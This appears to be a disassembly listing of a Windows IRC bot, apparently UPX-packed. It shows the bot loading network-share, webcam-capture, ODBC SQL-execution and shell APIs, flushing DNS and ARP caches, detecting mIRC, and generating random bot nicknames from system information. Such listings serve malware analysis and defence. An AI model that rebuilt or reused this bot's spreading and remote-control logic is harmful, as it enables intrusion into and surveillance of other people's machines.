; ---------------------------------------------------------------------------
loc_40A5C2: ; CODE XREF: sub_409B13+A85�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB758, eax
loc_40A5CD: ; CODE XREF: sub_409B13+AA7�j
; sub_409B13+AAD�j
mov ds:dword_4CB754, 1
loc_40A5D7: ; CODE XREF: sub_409B13+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A60C
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov ds:dword_4CB6D0, eax
call esi ; GetProcAddress
cmp ds:dword_4CB6D0, ebx
mov ds:dword_4CB6CC, eax
jz short loc_40A617
cmp eax, ebx
jnz short loc_40A621
jmp short loc_40A617
; ---------------------------------------------------------------------------
loc_40A60C: ; CODE XREF: sub_409B13+ACF�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB760, eax
loc_40A617: ; CODE XREF: sub_409B13+AF1�j
; sub_409B13+AF7�j
mov ds:dword_4CB75C, 1
loc_40A621: ; CODE XREF: sub_409B13+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A680
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov ds:dword_4CB6FC, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov ds:dword_4CB6F4, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov ds:dword_4CB6BC, eax
call esi ; GetProcAddress
cmp ds:dword_4CB6FC, ebx
mov ds:dword_4CB58C, eax
jz short loc_40A68B
cmp ds:dword_4CB6F4, ebx
jz short loc_40A68B
cmp ds:dword_4CB6BC, ebx
jz short loc_40A68B
cmp eax, ebx
jnz short loc_40A695
jmp short loc_40A68B
; ---------------------------------------------------------------------------
loc_40A680: ; CODE XREF: sub_409B13+B19�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB768, eax
loc_40A68B: ; CODE XREF: sub_409B13+B55�j
; sub_409B13+B5D�j ...
mov ds:dword_4CB764, 1
loc_40A695: ; CODE XREF: sub_409B13+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A6CA
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov ds:dword_4CB5C0, eax
call esi ; GetProcAddress
cmp ds:dword_4CB5C0, ebx
mov ds:dword_4CB6C8, eax
jz short loc_40A6D5
cmp eax, ebx
jnz short loc_40A6DF
jmp short loc_40A6D5
; ---------------------------------------------------------------------------
loc_40A6CA: ; CODE XREF: sub_409B13+B8D�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB770, eax
loc_40A6D5: ; CODE XREF: sub_409B13+BAF�j
; sub_409B13+BB5�j
mov ds:dword_4CB76C, 1
loc_40A6DF: ; CODE XREF: sub_409B13+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A768
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov ds:dword_4CB690, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov ds:dword_4CB6DC, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov ds:dword_4CB618, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov ds:dword_4CB5D0, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov ds:dword_4CB670, eax
call esi ; GetProcAddress
cmp ds:dword_4CB690, ebx
mov ds:dword_4CB5E0, eax
jz short loc_40A773
cmp ds:dword_4CB6DC, ebx
jz short loc_40A773
cmp ds:dword_4CB618, ebx
jz short loc_40A773
cmp ds:dword_4CB5D0, ebx
jz short loc_40A773
cmp ds:dword_4CB670, ebx
jz short loc_40A773
cmp eax, ebx
jnz short loc_40A77D
jmp short loc_40A773
; ---------------------------------------------------------------------------
loc_40A768: ; CODE XREF: sub_409B13+BD7�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB778, eax
loc_40A773: ; CODE XREF: sub_409B13+C2D�j
; sub_409B13+C35�j ...
mov ds:dword_4CB774, 1
loc_40A77D: ; CODE XREF: sub_409B13+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A7B2
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov ds:dword_4CB5A4, eax
call esi ; GetProcAddress
cmp ds:dword_4CB5A4, ebx
mov ds:dword_4CB684, eax
jz short loc_40A7BD
cmp eax, ebx
jnz short loc_40A7C7
jmp short loc_40A7BD
; ---------------------------------------------------------------------------
loc_40A7B2: ; CODE XREF: sub_409B13+C75�j
call dword_42708C ; RtlGetLastWin32Error
mov ds:dword_4CB780, eax
loc_40A7BD: ; CODE XREF: sub_409B13+C97�j
; sub_409B13+C9D�j
mov ds:dword_4CB77C, 1
loc_40A7C7: ; CODE XREF: sub_409B13+C9B�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409B13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7CF proc near ; CODE XREF: sub_401ACD+2537�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp ds:dword_4CB714, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40A817
push ds:dword_4CB718
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A817: ; CODE XREF: sub_40A7CF+1A�j
cmp ds:dword_4CB71C, esi
jz short loc_40A84B
push ds:dword_4CB720
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A84B: ; CODE XREF: sub_40A7CF+4E�j
cmp ds:dword_4CB724, esi
jz short loc_40A87F
push ds:dword_4CB728
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A87F: ; CODE XREF: sub_40A7CF+82�j
cmp ds:dword_4CB72C, esi
jz short loc_40A8B3
push ds:dword_4CB730
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A8B3: ; CODE XREF: sub_40A7CF+B6�j
cmp ds:dword_4CB734, esi
jz short loc_40A8E7
push ds:dword_4CB738
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A8E7: ; CODE XREF: sub_40A7CF+EA�j
cmp ds:dword_4CB73C, esi
jz short loc_40A91B
push ds:dword_4CB740
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A91B: ; CODE XREF: sub_40A7CF+11E�j
cmp ds:dword_4CB744, esi
jz short loc_40A94F
push ds:dword_4CB748
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A94F: ; CODE XREF: sub_40A7CF+152�j
cmp ds:dword_4CB74C, esi
jz short loc_40A983
push ds:dword_4CB750
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A983: ; CODE XREF: sub_40A7CF+186�j
cmp ds:dword_4CB754, esi
jz short loc_40A9B7
push ds:dword_4CB758
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A9B7: ; CODE XREF: sub_40A7CF+1BA�j
cmp ds:dword_4CB75C, esi
jz short loc_40A9EB
push ds:dword_4CB760
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40A9EB: ; CODE XREF: sub_40A7CF+1EE�j
cmp ds:dword_4CB764, esi
jz short loc_40AA1F
push ds:dword_4CB768
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40AA1F: ; CODE XREF: sub_40A7CF+222�j
cmp ds:dword_4CB76C, esi
jz short loc_40AA53
push ds:dword_4CB770
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40AA53: ; CODE XREF: sub_40A7CF+256�j
cmp ds:dword_4CB774, esi
jz short loc_40AA87
push ds:dword_4CB778
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40AA87: ; CODE XREF: sub_40A7CF+28A�j
cmp ds:dword_4CB77C, esi
jz short loc_40AABB
push ds:dword_4CB780
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_41B886
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 20h
loc_40AABB: ; CODE XREF: sub_40A7CF+2BE�j
lea eax, [ebp+var_200]
push offset unk_42DA2C
push eax
call sub_41B886
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40AAE8
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_40AAE8: ; CODE XREF: sub_40A7CF+302�j
lea eax, [ebp+var_200]
push eax
call sub_4151AD
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A7CF endp
; =============== S U B R O U T I N E =======================================
sub_40AAFA proc near ; CODE XREF: sub_4017ED+4F�p
; sub_401ACD+5C96�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40AB22
push [esp+arg_0]
call ds:dword_4CB6D8 ; gethostbyname
test eax, eax
jnz short loc_40AB1B
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40AB1B: ; CODE XREF: sub_40AAFA+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40AB22: ; CODE XREF: sub_40AAFA+D�j
retn
sub_40AAFA endp
; =============== S U B R O U T I N E =======================================
sub_40AB23 proc near ; CODE XREF: sub_4017ED+D6�p
mov ecx, ds:dword_4CB570
xor eax, eax
test ecx, ecx
jz short locret_40AB31
call ecx ; DnsFlushResolverCache
locret_40AB31: ; CODE XREF: sub_40AB23+A�j
retn
sub_40AB23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB32 proc near ; CODE XREF: sub_401ACD:loc_403F5E�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call ds:dword_4CB6D0 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40ABF8
sub ecx, 32h
jz loc_40ABF1
sub ecx, 48h
jz short loc_40AB92
sub ecx, 6Eh
jz short loc_40AB8B
loc_40AB74: ; CODE XREF: sub_40AB32+8B�j
push eax
lea eax, [ebp+var_88]
push offset unk_42DC40
push eax
call sub_41B886
add esp, 0Ch
jmp short loc_40ABD2
; ---------------------------------------------------------------------------
loc_40AB8B: ; CODE XREF: sub_40AB32+40�j
push offset unk_42DC1C
jmp short loc_40ABC4
; ---------------------------------------------------------------------------
loc_40AB92: ; CODE XREF: sub_40AB32+3B�j
push [ebp+var_8]
call sub_41B4D5
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_41B590
add esp, 10h
cmp esi, edi
jz short loc_40ABBF
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call ds:dword_4CB6D0 ; GetIpNetTable
cmp eax, edi
jz short loc_40ABF8
jmp short loc_40AB74
; ---------------------------------------------------------------------------
loc_40ABBF: ; CODE XREF: sub_40AB32+79�j
push offset unk_42DBEC
loc_40ABC4: ; CODE XREF: sub_40AB32+5E�j
; sub_40AB32+C4�j
lea eax, [ebp+var_88]
push eax
call sub_41B886
pop ecx
pop ecx
loc_40ABD2: ; CODE XREF: sub_40AB32+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_4151AD
pop ecx
loc_40ABE2: ; CODE XREF: sub_40AB32+C8�j
; sub_40AB32+DC�j
push esi
call sub_41B0B1
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40ABF1: ; CODE XREF: sub_40AB32+32�j
push offset unk_42DBBC
jmp short loc_40ABC4
; ---------------------------------------------------------------------------
loc_40ABF8: ; CODE XREF: sub_40AB32+29�j
; sub_40AB32+89�j
cmp [esi], edi
jbe short loc_40ABE2
lea ebx, [esi+4]
loc_40ABFF: ; CODE XREF: sub_40AB32+DA�j
push ebx
call ds:dword_4CB6CC ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40ABFF
jmp short loc_40ABE2
sub_40AB32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC10 proc near ; CODE XREF: sub_401ACD+2248�p
; sub_401ACD+2399�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call ds:dword_4CB5F8 ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_4CB784
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_41B886
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AC10 endp
; =============== S U B R O U T I N E =======================================
sub_40AC69 proc near ; CODE XREF: sub_412B09+24C�p
; sub_412B09+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40AC92
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40AC85: ; CODE XREF: sub_40AC69+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40AC85
pop edi
jmp short loc_40AC96
; ---------------------------------------------------------------------------
loc_40AC92: ; CODE XREF: sub_40AC69+A�j
mov edx, [esp+4+arg_0]
loc_40AC96: ; CODE XREF: sub_40AC69+27�j
test esi, esi
pop esi
jz short loc_40ACA0
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40ACA0: ; CODE XREF: sub_40AC69+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40AC69 endp
; =============== S U B R O U T I N E =======================================
sub_40ACB6 proc near ; CODE XREF: sub_40B08E+49�p
; DATA XREF: UPX0:off_42DC88�o
arg_0 = dword ptr 4
push esi
push edi
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_41B8E2
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+8+arg_0]
push off_42DCF0[edx*4]
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_41B980
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AD1E
loc_40ACF8: ; CODE XREF: sub_40ACB6+66�j
call sub_41B8E2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42BB64
push 1Ch
push edi
call sub_41B980
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40ACF8
loc_40AD1E: ; CODE XREF: sub_40ACB6+40�j
mov eax, edi
pop edi
pop esi
retn
sub_40ACB6 endp
; ---------------------------------------------------------------------------
push esi
push edi
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
mov edi, [esp+10h]
mov dword ptr [esp], offset asc_429140 ; "-"
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_41B980
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AD7C
loc_40AD56: ; CODE XREF: UPX0:0040AD7A�j
call sub_41B8E2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42BB64
push 1Ch
push edi
call sub_41B980
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AD56
loc_40AD7C: ; CODE XREF: UPX0:0040AD54�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_40AD81 proc near ; CODE XREF: sub_401ACD+69CD�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_41B8E2
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_429098
test esi, esi
jle short loc_40ADC4
loc_40ADAE: ; CODE XREF: sub_40AD81+41�j
call sub_41B8E2
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40ADAE
loc_40ADC4: ; CODE XREF: sub_40AD81+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40AD81 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_431948
push eax
push esi
call dword_4270C0 ; GetComputerNameA
movsx eax, byte_431948
push 41h
pop ecx
push 1
pop edx
loc_40AE0A: ; CODE XREF: UPX0:0040AE15�j
cmp eax, ecx
jnz short loc_40AE11
mov [ebp-4], edx
loc_40AE11: ; CODE XREF: UPX0:0040AE0C�j
inc ecx
cmp ecx, 5Bh
jl short loc_40AE0A
push 61h
pop ecx
loc_40AE1A: ; CODE XREF: UPX0:0040AE25�j
cmp eax, ecx
jnz short loc_40AE21
mov [ebp-4], edx
loc_40AE21: ; CODE XREF: UPX0:0040AE1C�j
inc ecx
cmp ecx, 7Bh
jl short loc_40AE1A
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41B980
xor esi, esi
add esp, 0Ch
cmp dword_429098, esi
jle short loc_40AE66
loc_40AE40: ; CODE XREF: UPX0:0040AE64�j
call sub_41B8E2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42BB64
push 1Ch
push edi
call sub_41B980
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AE40
loc_40AE66: ; CODE XREF: UPX0:0040AE3E�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call dword_4270C4 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_43194C
push 1Ch
push edi
call sub_41B980
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AEDB
loc_40AEB5: ; CODE XREF: UPX0:0040AED9�j
call sub_41B8E2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42BB64
push 1Ch
push edi
call sub_41B980
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AEB5
loc_40AEDB: ; CODE XREF: UPX0:0040AEB3�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_43D808
mov dword ptr [ebp-94h], 94h
call dword_4270C8 ; GetVersionExA
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_40AF65
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40AF45
cmp dword ptr [ebp-84h], 1
jnz short loc_40AF35
mov esi, offset dword_431974
loc_40AF35: ; CODE XREF: UPX0:0040AF2E�j
cmp dword ptr [ebp-84h], 2
jnz short loc_40AFA1
mov esi, offset dword_431970
jmp short loc_40AFA1
; ---------------------------------------------------------------------------
loc_40AF45: ; CODE XREF: UPX0:0040AF25�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_40AF55
mov esi, offset dword_43196C
jmp short loc_40AFA1
; ---------------------------------------------------------------------------
loc_40AF55: ; CODE XREF: UPX0:0040AF4C�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_40AF9C
mov esi, offset dword_431968
jmp short loc_40AFA1
; ---------------------------------------------------------------------------
loc_40AF65: ; CODE XREF: UPX0:0040AF1C�j
cmp dword ptr [ebp-90h], 5
jnz short loc_40AF9C
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40AF7E
mov esi, offset dword_431964
jmp short loc_40AFA1
; ---------------------------------------------------------------------------
loc_40AF7E: ; CODE XREF: UPX0:0040AF75�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_40AF8E
mov esi, offset dword_431960
jmp short loc_40AFA1
; ---------------------------------------------------------------------------
loc_40AF8E: ; CODE XREF: UPX0:0040AF85�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset dword_43195C
jz short loc_40AFA1
loc_40AF9C: ; CODE XREF: UPX0:0040AF5C�j
; UPX0:0040AF6C�j
mov esi, offset dword_431958
loc_40AFA1: ; CODE XREF: UPX0:0040AF3C�j
; UPX0:0040AF43�j ...
mov edi, [ebp+8]
push esi
push offset dword_431950
push 1Ch
push edi
call sub_41B980
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AFE5
loc_40AFBF: ; CODE XREF: UPX0:0040AFE3�j
call sub_41B8E2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42BB64
push 1Ch
push edi
call sub_41B980
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AFBF
loc_40AFE5: ; CODE XREF: UPX0:0040AFBD�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AFEB proc near ; CODE XREF: sub_40B08E+5C�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call dword_4270A8 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_40B03A
call ds:dword_4CB660 ; FindWindowA
test eax, eax
mov eax, offset dword_431980
jnz short loc_40B023
mov eax, offset byte_43D808
loc_40B023: ; CODE XREF: sub_40AFEB+31�j
push eax
push esi
push offset dword_431978
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41B980
add esp, 14h
jmp short loc_40B05A
; ---------------------------------------------------------------------------
loc_40B03A: ; CODE XREF: sub_40AFEB+22�j
call ds:dword_4CB660 ; FindWindowA
test eax, eax
mov eax, offset dword_431980
jnz short loc_40B04E
mov eax, offset byte_43D808
loc_40B04E: ; CODE XREF: sub_40AFEB+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_41B886
pop ecx
pop ecx
loc_40B05A: ; CODE XREF: sub_40AFEB+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_41AFE0
pop ecx
cmp eax, 2
pop esi
jbe short loc_40B089
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_41C1E0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_41B5F0
add esp, 18h
loc_40B089: ; CODE XREF: sub_40AFEB+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_40AFEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B08E proc near ; CODE XREF: sub_4017ED+7F�p
; sub_401955+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_42DC84
loc_40B09A: ; CODE XREF: sub_40B08E+3F�j
cmp [ebp+arg_C], 0
jz short loc_40B0B5
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_41C070
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B0BF
; ---------------------------------------------------------------------------
loc_40B0B5: ; CODE XREF: sub_40B08E+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40B0BF: ; CODE XREF: sub_40B08E+25�j
test eax, eax
jnz short loc_40B0D1
add esi, 14h
inc edi
cmp esi, offset off_42DCFC
jb short loc_40B09A
jmp short loc_40B0DF
; ---------------------------------------------------------------------------
loc_40B0D1: ; CODE XREF: sub_40B08E+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call off_42DC88[eax*4]
pop ecx
loc_40B0DF: ; CODE XREF: sub_40B08E+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40B0F2
push [ebp+arg_0]
call sub_40AFEB
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40B0F2: ; CODE XREF: sub_40B08E+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40B08E endp
; =============== S U B R O U T I N E =======================================
sub_40B0F7 proc near ; CODE XREF: sub_401221+378�p
; sub_401221+3B7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_43E390
loc_40B0FF: ; CODE XREF: sub_40B0F7+18�j
cmp byte ptr [eax], 0
jz short loc_40B113
add eax, 234h
inc edi
cmp eax, offset dword_4CB390
jl short loc_40B0FF
jmp short loc_40B15E
; ---------------------------------------------------------------------------
loc_40B113: ; CODE XREF: sub_40B0F7+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_43E390[esi]
push eax
call sub_41B5F0
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_43E590[esi], eax
and dword_43E594[esi], 0
mov eax, [esp+8+arg_8]
and dword_43E598[esi], 0
mov dword_43E59C[esi], eax
and byte_43E5A8[esi], 0
pop esi
loc_40B15E: ; CODE XREF: sub_40B0F7+1A�j
mov eax, edi
pop edi
retn
sub_40B0F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B162 proc near ; DATA XREF: sub_401ACD+298A�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
